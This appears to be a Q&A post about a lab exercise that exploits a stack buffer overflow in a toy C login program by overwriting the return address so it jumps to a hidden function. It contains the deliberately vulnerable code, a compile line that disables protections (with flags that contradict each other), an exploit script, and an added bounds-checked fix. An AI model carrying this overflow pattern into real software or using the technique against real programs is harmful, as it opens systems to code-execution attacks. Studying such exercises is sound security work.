I don't know how to use gdb to change the return address.
I want the program to end up jumping to myprivatetest().
Here is the code:
    #include <stdio.h>
    #include <stdlib.h>   /* needed for system() */
    #include <string.h>

    int UPtest(char *, char *, char *);
    void myprivatetest(void);

    int main(int argc, char **argv){
        if(UPtest(argv[1], argv[2], argv[3])){
            printf("Access granted...\n");
        } else {
            printf("Wrong username and password!!!!\n");
        }
        return 0;
    }

    int UPtest(char *a1, char *a2, char *a3){
        char Uid[29], Uname[27], Upass[72];
        /* unbounded copies into fixed-size stack buffers: this is the overflow */
        strcpy(Uid, a1);
        strcpy(Uname, a2);
        strcpy(Upass, a3);
        if(!strcmp(Uname, "Admin") && !strcmp(Upass, "PassAd007"))
            return 1;
        else
            return 0;
    }

    /* never called from main(); the goal is to reach it via the overwritten return address */
    void myprivatetest(void){
        printf("This is test code to run other system program.\n");
        system("/usr/bin/xeyes");
    }
It looks like you want to use a buffer overflow to overwrite the return address and jump to myprivatetest. The idea is that overwriting the rip register should be enough. I first used gdb to find the memory address of myprivatetest; that address is the value to put into rip. Compile with the following command:
    all:
    	gcc -o test test.c -fno-stack-protector -no-pie -z execstack -z noexecstack -z norelro -z now -z relro
Then use the following script:
    import subprocess
    from pwn import *

    # address of myprivatetest found with gdb, written little-endian
    # (the bytes c5 12 40 correspond to 0x4012c5)
    target = b'\xc5\x12@'
    print(target)

    arg1 = b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ"
    # padding up to the saved return address, followed by the target address
    arg2 = b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMOOOOPPPPQQQQRRRRSSSS" + target
    arg3 = b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ"

    # run the binary under gdb with the three arguments
    args = ["gdb", "-args", "test", arg1, arg2, arg3]
    context.terminal = ['tmux', 'splitw', '-h']
    subprocess.run(args)
The result is shown below:
Hope this helps~
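Added example, not code from the question or the answer: the same UPtest() logic with the copies bounded to the original buffer sizes, so an argument that would not fit is rejected instead of overwriting the saved return address. The names UPtest_safe and copy_bounded are my own.

```c
#include <stdio.h>
#include <string.h>

/* Bounded copy: returns 1 on success, 0 if src is NULL or would not fit
 * in dst (including its terminating NUL). Never reads past dst_size. */
static int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t len = 0;
    if (src == NULL)
        return 0;
    while (len < dst_size && src[len] != '\0')
        len++;
    if (len >= dst_size)       /* no room for the terminator: reject */
        return 0;
    memcpy(dst, src, len + 1);
    return 1;
}

/* Same buffer sizes as the question's UPtest(); only the copies differ.
 * Over-long input is rejected, so the saved return address that sits
 * past these locals can no longer be overwritten by a long argument. */
int UPtest_safe(const char *a1, const char *a2, const char *a3)
{
    char Uid[29], Uname[27], Upass[72];
    if (!copy_bounded(Uid, sizeof Uid, a1) ||
        !copy_bounded(Uname, sizeof Uname, a2) ||
        !copy_bounded(Upass, sizeof Upass, a3))
        return 0;
    if (!strcmp(Uname, "Admin") && !strcmp(Upass, "PassAd007"))
        return 1;
    return 0;
}

int main(int argc, char **argv)
{
    /* The original main() read argv[1..3] unconditionally; check argc. */
    if (argc < 4) {
        fprintf(stderr, "usage: %s uid uname upass\n", argv[0]);
        return 1;
    }
    puts(UPtest_safe(argv[1], argv[2], argv[3])
             ? "Access granted..."
             : "Wrong username and password!!!!");
    return 0;
}
```

Compiled with the same flags as above, the 72-byte-plus-address arg2 from the script is now simply rejected, and -fstack-protector can be left on as a second line of defence.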